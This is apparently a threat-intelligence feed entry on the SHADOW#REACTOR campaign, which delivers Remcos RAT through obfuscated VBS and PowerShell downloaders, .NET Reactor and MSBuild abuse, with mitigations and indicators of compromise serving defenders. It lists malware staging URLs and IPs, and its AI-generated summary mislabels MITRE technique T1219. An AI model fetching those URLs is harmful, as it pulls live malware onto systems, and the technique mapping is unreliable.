SHADOW#REACTOR – Text-Only Staging, .NET Reactor, and In-Memory Remcos RAT Deployments
This analysis examines a multi-stage Windows malware campaign called SHADOW#REACTOR. The infection chain uses obfuscated VBS, PowerShell downloaders, and text-based payloads to deliver a Remcos RAT backdoor. Key features include fragmented text staging, .NET Reactor protection, reflective loading, and MSBuild abuse as a living-off-the-land binary. The campaign leverages complex obfuscation and in-memory execution to evade detection while establishing persistent remote access. Defensive recommendations focus on script execution monitoring, LOLBin abuse detection, and enhanced PowerShell logging to counter the sophisticated evasion techniques employed.
AI Analysis
Technical Summary
The SHADOW#REACTOR campaign represents a complex Windows malware infection chain that delivers the Remcos Remote Access Trojan (RAT) through multiple sophisticated stages. Initial infection vectors involve obfuscated Visual Basic Script (VBS) and PowerShell downloaders that retrieve fragmented, text-only payloads from remote servers. These payloads are staged in a fragmented manner to evade signature-based detection. The campaign employs .NET Reactor, a commercial obfuscation and protection tool, to shield its components from reverse engineering and static analysis. Reflective loading techniques are used to execute code directly in memory, avoiding writing malicious binaries to disk and thus evading traditional antivirus and endpoint detection systems. A notable living-off-the-land technique is the abuse of MSBuild.exe, a legitimate Microsoft build tool, to execute malicious code without raising immediate suspicion. This abuse aligns with MITRE ATT&CK techniques T1219 (Signed Binary Proxy Execution) and T1047 (Windows Management Instrumentation). The Remcos RAT deployed provides attackers with persistent remote access, enabling data exfiltration, system control, and further lateral movement. The campaign’s obfuscation and in-memory execution complicate detection and forensic analysis. Indicators of compromise include multiple file hashes, IP addresses, and URLs linked to the malware’s infrastructure. Defensive recommendations emphasize enhanced PowerShell logging (to capture script execution details), monitoring for living-off-the-land binary (LOLBin) abuse such as MSBuild, and vigilant script execution monitoring to detect anomalous behaviors. Although no CVE or known exploits are currently associated, the campaign’s complexity and stealth techniques pose a significant threat to Windows-based environments.
Potential Impact
For European organizations, SHADOW#REACTOR poses a medium-level threat primarily targeting Windows environments that utilize MSBuild and PowerShell extensively. The campaign’s ability to evade detection through obfuscation, in-memory execution, and living-off-the-land techniques increases the risk of prolonged undetected intrusions. This can lead to unauthorized remote access, data theft, espionage, and potential disruption of critical business operations. Industries with high reliance on Microsoft development tools and scripting, such as software development firms, financial institutions, and government agencies, are particularly vulnerable. The persistent presence of Remcos RAT can facilitate lateral movement within networks, increasing the potential scope of compromise. The use of fragmented text-only staging and reflective loading complicates incident response and malware removal efforts. Although no widespread exploitation is reported yet, the campaign’s stealth and persistence capabilities could enable targeted attacks against strategic European sectors, including critical infrastructure and technology companies.
Mitigation Recommendations
1. Implement comprehensive PowerShell logging and enable module logging, script block logging, and transcription to capture detailed execution data for forensic analysis. 2. Monitor and restrict the use of living-off-the-land binaries (LOLBins) such as MSBuild.exe, especially for non-standard execution contexts, using application whitelisting and behavioral analytics. 3. Deploy endpoint detection and response (EDR) solutions capable of detecting reflective loading and in-memory execution techniques. 4. Enforce strict script execution policies via Group Policy Objects (GPOs) to limit the execution of unsigned or unauthorized scripts, including VBS and PowerShell scripts. 5. Conduct regular threat hunting exercises focusing on anomalous script execution, network connections to known malicious IPs and URLs, and unusual MSBuild activity. 6. Maintain updated threat intelligence feeds and integrate indicators of compromise (IOCs) such as hashes and IP addresses into security monitoring tools. 7. Educate users on the risks of executing unsolicited scripts or opening suspicious attachments to reduce the likelihood of initial infection. 8. Segment networks to limit lateral movement opportunities for attackers who gain initial access. 9. Regularly audit and harden Windows environments to minimize attack surface, including disabling unnecessary scripting engines where possible. 10. Utilize sandboxing and behavioral analysis tools to detect obfuscated and reflective malware payloads during the initial infection stages.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland
Indicators of Compromise
- hash: 21f1da8b05ab5f52520fc8febe1f7746
- hash: 75bc24315a945d4d88f1514a7a239381
- hash: 48cf1b1d29cb3a2dab7e63cdb4f953496672a744
- hash: d4416febc8510e042a6bed5e50a343d3ce4caac3
- hash: 1106b820450d0962abf503c80fda44a890e4245555b97ba7656c7329c0ea2313
- hash: 1fd111954e3eefeef07557345918ea6527898b741dfd9242ff4f5c2ddceaa5e9
- hash: 507c97cc711818eb03cfffd3743cebb43820eeafa5c962c03840f379592d2df5
- hash: 90d552da574192494b4280a1ee733f0c8238f5e07e80b31f4b8e028ba88ee7ea
- hash: 985513b27391b0f9d6d0e498b5cec35df9028a5af971b943170327478d976559
- hash: a35a036b9b6a7baa194aef2eb9b23992b53058d68df6a4f72815e721a93b8d41
- ip: 193.24.123.232
- ip: 91.202.233.215
- url: http://91.202.233.215/config.txt
- url: http://91.202.233.215/t/qpwoe32.txt
- url: http://91.202.233.215/t/qpwoe64.txt
- url: http://91.202.233.215/win64.vbs
SHADOW#REACTOR – Text-Only Staging, .NET Reactor, and In-Memory Remcos RAT Deployments
Description
This analysis examines a multi-stage Windows malware campaign called SHADOW#REACTOR. The infection chain uses obfuscated VBS, PowerShell downloaders, and text-based payloads to deliver a Remcos RAT backdoor. Key features include fragmented text staging, .NET Reactor protection, reflective loading, and MSBuild abuse as a living-off-the-land binary. The campaign leverages complex obfuscation and in-memory execution to evade detection while establishing persistent remote access. Defensive recommendations focus on script execution monitoring, LOLBin abuse detection, and enhanced PowerShell logging to counter the sophisticated evasion techniques employed.
AI-Powered Analysis
Technical Analysis
The SHADOW#REACTOR campaign represents a complex Windows malware infection chain that delivers the Remcos Remote Access Trojan (RAT) through multiple sophisticated stages. Initial infection vectors involve obfuscated Visual Basic Script (VBS) and PowerShell downloaders that retrieve fragmented, text-only payloads from remote servers. These payloads are staged in a fragmented manner to evade signature-based detection. The campaign employs .NET Reactor, a commercial obfuscation and protection tool, to shield its components from reverse engineering and static analysis. Reflective loading techniques are used to execute code directly in memory, avoiding writing malicious binaries to disk and thus evading traditional antivirus and endpoint detection systems. A notable living-off-the-land technique is the abuse of MSBuild.exe, a legitimate Microsoft build tool, to execute malicious code without raising immediate suspicion. This abuse aligns with MITRE ATT&CK techniques T1219 (Signed Binary Proxy Execution) and T1047 (Windows Management Instrumentation). The Remcos RAT deployed provides attackers with persistent remote access, enabling data exfiltration, system control, and further lateral movement. The campaign’s obfuscation and in-memory execution complicate detection and forensic analysis. Indicators of compromise include multiple file hashes, IP addresses, and URLs linked to the malware’s infrastructure. Defensive recommendations emphasize enhanced PowerShell logging (to capture script execution details), monitoring for living-off-the-land binary (LOLBin) abuse such as MSBuild, and vigilant script execution monitoring to detect anomalous behaviors. Although no CVE or known exploits are currently associated, the campaign’s complexity and stealth techniques pose a significant threat to Windows-based environments.
Potential Impact
For European organizations, SHADOW#REACTOR poses a medium-level threat primarily targeting Windows environments that utilize MSBuild and PowerShell extensively. The campaign’s ability to evade detection through obfuscation, in-memory execution, and living-off-the-land techniques increases the risk of prolonged undetected intrusions. This can lead to unauthorized remote access, data theft, espionage, and potential disruption of critical business operations. Industries with high reliance on Microsoft development tools and scripting, such as software development firms, financial institutions, and government agencies, are particularly vulnerable. The persistent presence of Remcos RAT can facilitate lateral movement within networks, increasing the potential scope of compromise. The use of fragmented text-only staging and reflective loading complicates incident response and malware removal efforts. Although no widespread exploitation is reported yet, the campaign’s stealth and persistence capabilities could enable targeted attacks against strategic European sectors, including critical infrastructure and technology companies.
Mitigation Recommendations
1. Implement comprehensive PowerShell logging and enable module logging, script block logging, and transcription to capture detailed execution data for forensic analysis. 2. Monitor and restrict the use of living-off-the-land binaries (LOLBins) such as MSBuild.exe, especially for non-standard execution contexts, using application whitelisting and behavioral analytics. 3. Deploy endpoint detection and response (EDR) solutions capable of detecting reflective loading and in-memory execution techniques. 4. Enforce strict script execution policies via Group Policy Objects (GPOs) to limit the execution of unsigned or unauthorized scripts, including VBS and PowerShell scripts. 5. Conduct regular threat hunting exercises focusing on anomalous script execution, network connections to known malicious IPs and URLs, and unusual MSBuild activity. 6. Maintain updated threat intelligence feeds and integrate indicators of compromise (IOCs) such as hashes and IP addresses into security monitoring tools. 7. Educate users on the risks of executing unsolicited scripts or opening suspicious attachments to reduce the likelihood of initial infection. 8. Segment networks to limit lateral movement opportunities for attackers who gain initial access. 9. Regularly audit and harden Windows environments to minimize attack surface, including disabling unnecessary scripting engines where possible. 10. Utilize sandboxing and behavioral analysis tools to detect obfuscated and reflective malware payloads during the initial infection stages.
Affected Countries
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://www.securonix.com/blog/shadowreactor-text-only-staging-net-reactor-and-in-memory-remcos-rat-deployment/"]
- Adversary
- null
- Pulse Id
- 69666ffc29ff0976c2de82b9
- Threat Score
- null
Indicators of Compromise
Hash
| Value | Description | Copy |
|---|---|---|
hash21f1da8b05ab5f52520fc8febe1f7746 | — | |
hash75bc24315a945d4d88f1514a7a239381 | — | |
hash48cf1b1d29cb3a2dab7e63cdb4f953496672a744 | — | |
hashd4416febc8510e042a6bed5e50a343d3ce4caac3 | — | |
hash1106b820450d0962abf503c80fda44a890e4245555b97ba7656c7329c0ea2313 | — | |
hash1fd111954e3eefeef07557345918ea6527898b741dfd9242ff4f5c2ddceaa5e9 | — | |
hash507c97cc711818eb03cfffd3743cebb43820eeafa5c962c03840f379592d2df5 | — | |
hash90d552da574192494b4280a1ee733f0c8238f5e07e80b31f4b8e028ba88ee7ea | — | |
hash985513b27391b0f9d6d0e498b5cec35df9028a5af971b943170327478d976559 | — | |
hasha35a036b9b6a7baa194aef2eb9b23992b53058d68df6a4f72815e721a93b8d41 | — |
Ip
| Value | Description | Copy |
|---|---|---|
ip193.24.123.232 | — | |
ip91.202.233.215 | — |
Url
| Value | Description | Copy |
|---|---|---|
urlhttp://91.202.233.215/config.txt | — | |
urlhttp://91.202.233.215/t/qpwoe32.txt | — | |
urlhttp://91.202.233.215/t/qpwoe64.txt | — | |
urlhttp://91.202.233.215/win64.vbs | — |
Threat ID: 69667238a60475309f879f30
Added to database: 1/13/2026, 4:26:32 PM
Last enriched: 1/13/2026, 4:43:22 PM
Last updated: 1/14/2026, 3:54:45 AM
Views: 75
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
New Advanced Linux VoidLink Malware Targets Cloud and container Environments
MediumThreatFox IOCs for 2026-01-13
MediumAnalyzing a Multi-Stage AsyncRAT Campaign via Managed Detection and Response
MediumReflecting on AI in 2025: Faster Attacks, Same Old Tradecraft
MediumThe Cloud-Native Malware Framework
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.